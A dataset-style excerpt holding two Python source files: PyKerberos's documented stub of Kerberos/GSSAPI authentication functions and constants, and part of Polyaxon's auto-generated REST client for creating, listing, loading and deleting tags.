max_stars_repo_path
stringlengths 4
245
| max_stars_repo_name
stringlengths 7
115
| max_stars_count
int64 101
368k
| id
stringlengths 2
8
| content
stringlengths 6
1.03M
|
---|---|---|---|---|
desktop/core/ext-py/kerberos-1.3.0/pysrc/kerberos.py
|
yetsun/hue
| 5,079 |
66601
|
##
# Copyright (c) 2006-2018 Apple Inc. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
##
"""
PyKerberos Function Description.
"""
class KrbError(Exception):
pass
class BasicAuthError(KrbError):
pass
class GSSError(KrbError):
pass
def checkPassword(user, pswd, service, default_realm):
"""
This function provides a simple way to verify that a user name and password
match those normally used for Kerberos authentication.
It does this by checking that the supplied user name and password can be
used to get a ticket for the supplied service.
If the user name does not contain a realm, then the default realm supplied
is used.
For this to work properly the Kerberos must be configured properly on this
machine.
That will likely mean ensuring that the edu.mit.Kerberos preference file
has the correct realms and KDCs listed.
IMPORTANT: This method is vulnerable to KDC spoofing attacks and it should
only used for testing. Do not use this in any production system - your
security could be compromised if you do.
@param user: A string containing the Kerberos user name.
A realm may be included by appending an C{"@"} followed by the realm
string to the actual user id.
If no realm is supplied, then the realm set in the default_realm
argument will be used.
@param pswd: A string containing the password for the user.
@param service: A string containing the Kerberos service to check access
for.
This will be of the form C{"sss/xx.yy.zz"}, where C{"sss"} is the
service identifier (e.g., C{"http"}, C{"krbtgt"}), and C{"xx.yy.zz"} is
the hostname of the server.
@param default_realm: A string containing the default realm to use if one
is not supplied in the user argument.
Note that Kerberos realms are normally all uppercase (e.g.,
C{"EXAMPLE.COM"}).
@return: True if authentication succeeds, false otherwise.
"""
def changePassword(user, oldpswd, newpswd):
"""
This function allows to change the user password on the KDC.
@param user: A string containing the Kerberos user name.
A realm may be included by appending a C{"@"} followed by the realm
string to the actual user id.
If no realm is supplied, then the realm set in the default_realm
argument will be used.
@param oldpswd: A string containing the old (current) password for the
user.
@param newpswd: A string containing the new password for the user.
@return: True if password changing succeeds, false otherwise.
"""
def getServerPrincipalDetails(service, hostname):
"""
This function returns the service principal for the server given a service
type and hostname.
Details are looked up via the C{/etc/keytab} file.
@param service: A string containing the Kerberos service type for the
server.
@param hostname: A string containing the hostname of the server.
@return: A string containing the service principal.
"""
"""
GSSAPI Function Result Codes:
-1 : Error
0 : GSSAPI step continuation (only returned by 'Step' function)
1 : GSSAPI step complete, or function return OK
"""
# Some useful result codes
AUTH_GSS_CONTINUE = 0
AUTH_GSS_COMPLETE = 1
# Some useful gss flags
GSS_C_DELEG_FLAG = 1
GSS_C_MUTUAL_FLAG = 2
GSS_C_REPLAY_FLAG = 4
GSS_C_SEQUENCE_FLAG = 8
GSS_C_CONF_FLAG = 16
GSS_C_INTEG_FLAG = 32
GSS_C_ANON_FLAG = 64
GSS_C_PROT_READY_FLAG = 128
GSS_C_TRANS_FLAG = 256
def authGSSClientInit(service, **kwargs):
"""
Initializes a context for GSSAPI client-side authentication with the given
service principal.
L{authGSSClientClean} must be called after this function returns an OK
result to dispose of the context once all GSSAPI operations are complete.
@param service: A string containing the service principal in the form
C{"type@fqdn"}.
@param principal: Optional string containing the client principal in the
form C{"user@realm"}.
@param gssflags: Optional integer used to set GSS flags.
(e.g. C{GSS_C_DELEG_FLAG|GSS_C_MUTUAL_FLAG|GSS_C_SEQUENCE_FLAG} will
allow for forwarding credentials to the remote host)
@param delegated: Optional server context containing delegated credentials
@param mech_oid: Optional GGS mech OID
@return: A tuple of (result, context) where result is the result code (see
above) and context is an opaque value that will need to be passed to
subsequent functions.
"""
def authGSSClientClean(context):
"""
Destroys the context for GSSAPI client-side authentication. This function
is provided for compatibility with earlier versions of PyKerberos but does
nothing. The context object destroys itself when it is reclaimed.
@param context: The context object returned from L{authGSSClientInit}.
@return: A result code (see above).
"""
def authGSSClientInquireCred(context):
"""
Get the current user name, if any, without a client-side GSSAPI step.
If the principal has already been authenticated via completed client-side
GSSAPI steps then the user name of the authenticated principal is kept. The
user name will be available via authGSSClientUserName.
@param context: The context object returned from L{authGSSClientInit}.
@return: A result code (see above).
"""
"""
Address Types for Channel Bindings
https://docs.oracle.com/cd/E19455-01/806-3814/6jcugr7dp/index.html#reference-9
"""
GSS_C_AF_UNSPEC = 0
GSS_C_AF_LOCAL = 1
GSS_C_AF_INET = 2
GSS_C_AF_IMPLINK = 3
GSS_C_AF_PUP = 4
GSS_C_AF_CHAOS = 5
GSS_C_AF_NS = 6
GSS_C_AF_NBS = 7
GSS_C_AF_ECMA = 8
GSS_C_AF_DATAKIT = 9
GSS_C_AF_CCITT = 10
GSS_C_AF_SNA = 11
GSS_C_AF_DECnet = 12
GSS_C_AF_DLI = 13
GSS_C_AF_LAT = 14
GSS_C_AF_HYLINK = 15
GSS_C_AF_APPLETALK = 16
GSS_C_AF_BSC = 17
GSS_C_AF_DSS = 18
GSS_C_AF_OSI = 19
GSS_C_AF_X25 = 21
GSS_C_AF_NULLADDR = 255
def channelBindings(**kwargs):
"""
Builds a gss_channel_bindings_struct which can be used to pass onto
L{authGSSClientStep} to bind onto the auth. Details on Channel Bindings
can be foud at https://tools.ietf.org/html/rfc5929. More details on the
struct can be found at
https://docs.oracle.com/cd/E19455-01/806-3814/overview-52/index.html
@param initiator_addrtype: Optional integer used to set the
initiator_addrtype, defaults to GSS_C_AF_UNSPEC if not set
@param initiator_address: Optional byte string containing the
initiator_address
@param acceptor_addrtype: Optional integer used to set the
acceptor_addrtype, defaults to GSS_C_AF_UNSPEC if not set
@param acceptor_address: Optional byte string containing the
acceptor_address
@param application_data: Optional byte string containing the
application_data. An example would be 'tls-server-end-point:{cert-hash}'
where {cert-hash} is the hash of the server's certificate
@return: A tuple of (result, gss_channel_bindings_struct) where result is
the result code and gss_channel_bindings_struct is the channel bindings
structure that can be passed onto L{authGSSClientStep}
"""
def authGSSClientStep(context, challenge, **kwargs):
"""
Processes a single GSSAPI client-side step using the supplied server data.
@param context: The context object returned from L{authGSSClientInit}.
@param challenge: A string containing the base64-encoded server data (which
may be empty for the first step).
@param channel_bindings: Optional channel bindings to bind onto the auth
request. This struct can be built using :{channelBindings}
and if not specified it will pass along GSS_C_NO_CHANNEL_BINDINGS as
a default.
@return: A result code (see above).
"""
def authGSSClientResponse(context):
"""
Get the client response from the last successful GSSAPI client-side step.
@param context: The context object returned from L{authGSSClientInit}.
@return: A string containing the base64-encoded client data to be sent to
the server.
"""
def authGSSClientResponseConf(context):
"""
Determine whether confidentiality was enabled in the previously unwrapped
buffer.
@param context: The context object returned from L{authGSSClientInit}.
@return: C{1} if confidentiality was enabled in the previously unwrapped
buffer, C{0} otherwise.
"""
def authGSSClientUserName(context):
"""
Get the user name of the principal authenticated via the now complete
GSSAPI client-side operations, or the current user name obtained via
authGSSClientInquireCred. This method must only be called after
authGSSClientStep or authGSSClientInquireCred return a complete response
code.
@param context: The context object returned from L{authGSSClientInit}.
@return: A string containing the user name.
"""
def authGSSClientUnwrap(context, challenge):
"""
Perform the client side GSSAPI unwrap step.
@param challenge: A string containing the base64-encoded server data.
@return: A result code (see above)
"""
def authGSSClientWrap(context, data, user=None, protect=0):
"""
Perform the client side GSSAPI wrap step.
@param data: The result of the L{authGSSClientResponse} after the
L{authGSSClientUnwrap}.
@param user: The user to authorize.
@param protect: If C{0}, then just provide integrity protection.
If C{1}, then provide confidentiality as well.
@return: A result code (see above)
"""
def authGSSServerInit(service):
"""
Initializes a context for GSSAPI server-side authentication with the given
service principal.
authGSSServerClean must be called after this function returns an OK result
to dispose of the context once all GSSAPI operations are complete.
@param service: A string containing the service principal in the form
C{"type@fqdn"}. To initialize the context for the purpose of accepting
delegated credentials, pass the literal string C{"DELEGATE"}.
@return: A tuple of (result, context) where result is the result code (see
above) and context is an opaque value that will need to be passed to
subsequent functions.
"""
def authGSSServerClean(context):
"""
Destroys the context for GSSAPI server-side authentication. This function
is provided for compatibility with earlier versions of PyKerberos but does
nothing. The context object destroys itself when it is reclaimed.
@param context: The context object returned from L{authGSSClientInit}.
@return: A result code (see above).
"""
def authGSSServerStep(context, challenge):
"""
Processes a single GSSAPI server-side step using the supplied client data.
@param context: The context object returned from L{authGSSClientInit}.
@param challenge: A string containing the base64-encoded client data.
@return: A result code (see above).
"""
def authGSSServerResponse(context):
"""
Get the server response from the last successful GSSAPI server-side step.
@param context: The context object returned from L{authGSSClientInit}.
@return: A string containing the base64-encoded server data to be sent to
the client.
"""
def authGSSServerHasDelegated(context):
"""
Checks whether a server context has delegated credentials.
@param context: The context object returned from L{authGSSClientInit}.
@return: A bool saying whether delegated credentials are available.
"""
def authGSSServerUserName(context):
"""
Get the user name of the principal trying to authenticate to the server.
This method must only be called after L{authGSSServerStep} returns a
complete or continue response code.
@param context: The context object returned from L{authGSSClientInit}.
@return: A string containing the user name.
"""
def authGSSServerTargetName(context):
"""
Get the target name if the server did not supply its own credentials.
This method must only be called after L{authGSSServerStep} returns a
complete or continue response code.
@param context: The context object returned from L{authGSSClientInit}.
@return: A string containing the target name.
"""
def authGSSServerStoreDelegate(context):
"""
Save the ticket sent to the server in the file C{/tmp/krb5_pyserv_XXXXXX}.
This method must only be called after L{authGSSServerStep} returns a
complete or continue response code.
@param context: The context object returned from L{authGSSClientInit}.
@return: A result code (see above).
"""
def authGSSServerCacheName(context):
"""
Get the name of the credential cache created with
L{authGSSServerStoreDelegate}.
This method must only be called after L{authGSSServerStoreDelegate}.
@param context: The context object returned from L{authGSSClientInit}.
@return: A string containing the cache name.
"""
|
sdks/python/http_client/v1/polyaxon_sdk/api/tags_v1_api.py
|
polyaxon/polyaxon
| 3,200 |
66631
|
#!/usr/bin/python
#
# Copyright 2018-2021 Polyaxon, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# coding: utf-8
"""
Polyaxon SDKs and REST API specification.
Polyaxon SDKs and REST API specification. # noqa: E501
The version of the OpenAPI document: 1.11.3
Contact: <EMAIL>
Generated by: https://openapi-generator.tech
"""
from __future__ import absolute_import
import re # noqa: F401
# python 2 and python 3 compatibility library
import six
from polyaxon_sdk.api_client import ApiClient
from polyaxon_sdk.exceptions import ( # noqa: F401
ApiTypeError,
ApiValueError
)
class TagsV1Api(object):
"""NOTE: This class is auto generated by OpenAPI Generator
Ref: https://openapi-generator.tech
Do not edit the class manually.
"""
def __init__(self, api_client=None):
if api_client is None:
api_client = ApiClient()
self.api_client = api_client
def create_tag(self, owner, body, **kwargs): # noqa: E501
"""Create tag # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.create_tag(owner, body, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str owner: Owner of the namespace (required)
:param V1Tag body: Tag body (required)
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: V1Tag
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
return self.create_tag_with_http_info(owner, body, **kwargs) # noqa: E501
def create_tag_with_http_info(self, owner, body, **kwargs): # noqa: E501
"""Create tag # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.create_tag_with_http_info(owner, body, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str owner: Owner of the namespace (required)
:param V1Tag body: Tag body (required)
:param _return_http_data_only: response data without head status code
and headers
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: tuple(V1Tag, status_code(int), headers(HTTPHeaderDict))
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = [
'owner',
'body'
]
all_params.extend(
[
'async_req',
'_return_http_data_only',
'_preload_content',
'_request_timeout'
]
)
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method create_tag" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'owner' is set
if self.api_client.client_side_validation and ('owner' not in local_var_params or # noqa: E501
local_var_params['owner'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `owner` when calling `create_tag`") # noqa: E501
# verify the required parameter 'body' is set
if self.api_client.client_side_validation and ('body' not in local_var_params or # noqa: E501
local_var_params['body'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `body` when calling `create_tag`") # noqa: E501
collection_formats = {}
path_params = {}
if 'owner' in local_var_params:
path_params['owner'] = local_var_params['owner'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'body' in local_var_params:
body_params = local_var_params['body']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['ApiKey'] # noqa: E501
return self.api_client.call_api(
'/api/v1/orgs/{owner}/tags', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='V1Tag', # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
def delete_tag(self, owner, name, **kwargs): # noqa: E501
"""Delete tag # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.delete_tag(owner, name, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str owner: Owner of the namespace (required)
:param str name: Component under namesapce (required)
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: None
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
return self.delete_tag_with_http_info(owner, name, **kwargs) # noqa: E501
def delete_tag_with_http_info(self, owner, name, **kwargs): # noqa: E501
"""Delete tag # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.delete_tag_with_http_info(owner, name, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str owner: Owner of the namespace (required)
:param str name: Component under namesapce (required)
:param _return_http_data_only: response data without head status code
and headers
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: None
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = [
'owner',
'name'
]
all_params.extend(
[
'async_req',
'_return_http_data_only',
'_preload_content',
'_request_timeout'
]
)
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method delete_tag" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'owner' is set
if self.api_client.client_side_validation and ('owner' not in local_var_params or # noqa: E501
local_var_params['owner'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `owner` when calling `delete_tag`") # noqa: E501
# verify the required parameter 'name' is set
if self.api_client.client_side_validation and ('name' not in local_var_params or # noqa: E501
local_var_params['name'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `name` when calling `delete_tag`") # noqa: E501
collection_formats = {}
path_params = {}
if 'owner' in local_var_params:
path_params['owner'] = local_var_params['owner'] # noqa: E501
if 'name' in local_var_params:
path_params['name'] = local_var_params['name'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['ApiKey'] # noqa: E501
return self.api_client.call_api(
'/api/v1/orgs/{owner}/tags/{name}', 'DELETE',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type=None, # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
def get_tag(self, owner, name, **kwargs): # noqa: E501
"""Get tag # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_tag(owner, name, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str owner: Owner of the namespace (required)
:param str name: Component under namesapce (required)
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: V1Tag
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
return self.get_tag_with_http_info(owner, name, **kwargs) # noqa: E501
def get_tag_with_http_info(self, owner, name, **kwargs): # noqa: E501
"""Get tag # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_tag_with_http_info(owner, name, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str owner: Owner of the namespace (required)
:param str name: Component under namesapce (required)
:param _return_http_data_only: response data without head status code
and headers
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: tuple(V1Tag, status_code(int), headers(HTTPHeaderDict))
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = [
'owner',
'name'
]
all_params.extend(
[
'async_req',
'_return_http_data_only',
'_preload_content',
'_request_timeout'
]
)
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method get_tag" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'owner' is set
if self.api_client.client_side_validation and ('owner' not in local_var_params or # noqa: E501
local_var_params['owner'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `owner` when calling `get_tag`") # noqa: E501
# verify the required parameter 'name' is set
if self.api_client.client_side_validation and ('name' not in local_var_params or # noqa: E501
local_var_params['name'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `name` when calling `get_tag`") # noqa: E501
collection_formats = {}
path_params = {}
if 'owner' in local_var_params:
path_params['owner'] = local_var_params['owner'] # noqa: E501
if 'name' in local_var_params:
path_params['name'] = local_var_params['name'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['ApiKey'] # noqa: E501
return self.api_client.call_api(
'/api/v1/orgs/{owner}/tags/{name}', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='V1Tag', # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
def list_tags(self, owner, **kwargs): # noqa: E501
"""List tags # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.list_tags(owner, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str owner: Owner of the namespace (required)
:param int offset: Pagination offset.
:param int limit: Limit size.
:param str sort: Sort to order the search.
:param str query: Query filter the search.
:param bool bookmarks: Filter by bookmarks.
:param str pins: Pinned entities.
:param str mode: Mode of the search.
:param bool no_page: No pagination.
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: V1ListTagsResponse
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
return self.list_tags_with_http_info(owner, **kwargs) # noqa: E501
def list_tags_with_http_info(self, owner, **kwargs): # noqa: E501
"""List tags # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.list_tags_with_http_info(owner, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str owner: Owner of the namespace (required)
:param int offset: Pagination offset.
:param int limit: Limit size.
:param str sort: Sort to order the search.
:param str query: Query filter the search.
:param bool bookmarks: Filter by bookmarks.
:param str pins: Pinned entities.
:param str mode: Mode of the search.
:param bool no_page: No pagination.
:param _return_http_data_only: response data without head status code
and headers
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: tuple(V1ListTagsResponse, status_code(int), headers(HTTPHeaderDict))
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = [
'owner',
'offset',
'limit',
'sort',
'query',
'bookmarks',
'pins',
'mode',
'no_page'
]
all_params.extend(
[
'async_req',
'_return_http_data_only',
'_preload_content',
'_request_timeout'
]
)
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method list_tags" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'owner' is set
if self.api_client.client_side_validation and ('owner' not in local_var_params or # noqa: E501
local_var_params['owner'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `owner` when calling `list_tags`") # noqa: E501
collection_formats = {}
path_params = {}
if 'owner' in local_var_params:
path_params['owner'] = local_var_params['owner'] # noqa: E501
query_params = []
if 'offset' in local_var_params and local_var_params['offset'] is not None: # noqa: E501
query_params.append(('offset', local_var_params['offset'])) # noqa: E501
if 'limit' in local_var_params and local_var_params['limit'] is not None: # noqa: E501
query_params.append(('limit', local_var_params['limit'])) # noqa: E501
if 'sort' in local_var_params and local_var_params['sort'] is not None: # noqa: E501
query_params.append(('sort', local_var_params['sort'])) # noqa: E501
if 'query' in local_var_params and local_var_params['query'] is not None: # noqa: E501
query_params.append(('query', local_var_params['query'])) # noqa: E501
if 'bookmarks' in local_var_params and local_var_params['bookmarks'] is not None: # noqa: E501
query_params.append(('bookmarks', local_var_params['bookmarks'])) # noqa: E501
if 'pins' in local_var_params and local_var_params['pins'] is not None: # noqa: E501
query_params.append(('pins', local_var_params['pins'])) # noqa: E501
if 'mode' in local_var_params and local_var_params['mode'] is not None: # noqa: E501
query_params.append(('mode', local_var_params['mode'])) # noqa: E501
if 'no_page' in local_var_params and local_var_params['no_page'] is not None: # noqa: E501
query_params.append(('no_page', local_var_params['no_page'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['ApiKey'] # noqa: E501
return self.api_client.call_api(
'/api/v1/orgs/{owner}/tags', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='V1ListTagsResponse', # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
def load_tags(self, owner, **kwargs): # noqa: E501
"""Load tags # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.load_tags(owner, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str owner: Owner of the namespace (required)
:param int offset: Pagination offset.
:param int limit: Limit size.
:param str sort: Sort to order the search.
:param str query: Query filter the search.
:param bool bookmarks: Filter by bookmarks.
:param str pins: Pinned entities.
:param str mode: Mode of the search.
:param bool no_page: No pagination.
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: V1LoadTagsResponse
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
return self.load_tags_with_http_info(owner, **kwargs) # noqa: E501
def load_tags_with_http_info(self, owner, **kwargs): # noqa: E501
"""Load tags # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.load_tags_with_http_info(owner, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str owner: Owner of the namespace (required)
:param int offset: Pagination offset.
:param int limit: Limit size.
:param str sort: Sort to order the search.
:param str query: Query filter the search.
:param bool bookmarks: Filter by bookmarks.
:param str pins: Pinned entities.
:param str mode: Mode of the search.
:param bool no_page: No pagination.
:param _return_http_data_only: response data without head status code
and headers
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: tuple(V1LoadTagsResponse, status_code(int), headers(HTTPHeaderDict))
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = [
'owner',
'offset',
'limit',
'sort',
'query',
'bookmarks',
'pins',
'mode',
'no_page'
]
all_params.extend(
[
'async_req',
'_return_http_data_only',
'_preload_content',
'_request_timeout'
]
)
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method load_tags" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'owner' is set
if self.api_client.client_side_validation and ('owner' not in local_var_params or # noqa: E501
local_var_params['owner'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `owner` when calling `load_tags`") # noqa: E501
collection_formats = {}
path_params = {}
if 'owner' in local_var_params:
path_params['owner'] = local_var_params['owner'] # noqa: E501
query_params = []
if 'offset' in local_var_params and local_var_params['offset'] is not None: # noqa: E501
query_params.append(('offset', local_var_params['offset'])) # noqa: E501
if 'limit' in local_var_params and local_var_params['limit'] is not None: # noqa: E501
query_params.append(('limit', local_var_params['limit'])) # noqa: E501
if 'sort' in local_var_params and local_var_params['sort'] is not None: # noqa: E501
query_params.append(('sort', local_var_params['sort'])) # noqa: E501
if 'query' in local_var_params and local_var_params['query'] is not None: # noqa: E501
query_params.append(('query', local_var_params['query'])) # noqa: E501
if 'bookmarks' in local_var_params and local_var_params['bookmarks'] is not None: # noqa: E501
query_params.append(('bookmarks', local_var_params['bookmarks'])) # noqa: E501
if 'pins' in local_var_params and local_var_params['pins'] is not None: # noqa: E501
query_params.append(('pins', local_var_params['pins'])) # noqa: E501
if 'mode' in local_var_params and local_var_params['mode'] is not None: # noqa: E501
query_params.append(('mode', local_var_params['mode'])) # noqa: E501
if 'no_page' in local_var_params and local_var_params['no_page'] is not None: # noqa: E501
query_params.append(('no_page', local_var_params['no_page'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['ApiKey'] # noqa: E501
return self.api_client.call_api(
'/api/v1/orgs/{owner}/tags/load', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='V1LoadTagsResponse', # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
def patch_tag(self, owner, tag_name, body, **kwargs): # noqa: E501
"""Patch tag # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.patch_tag(owner, tag_name, body, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str owner: Owner of the namespace (required)
:param str tag_name: Tag name (required)
:param V1Tag body: Tag body (required)
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: V1Tag
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
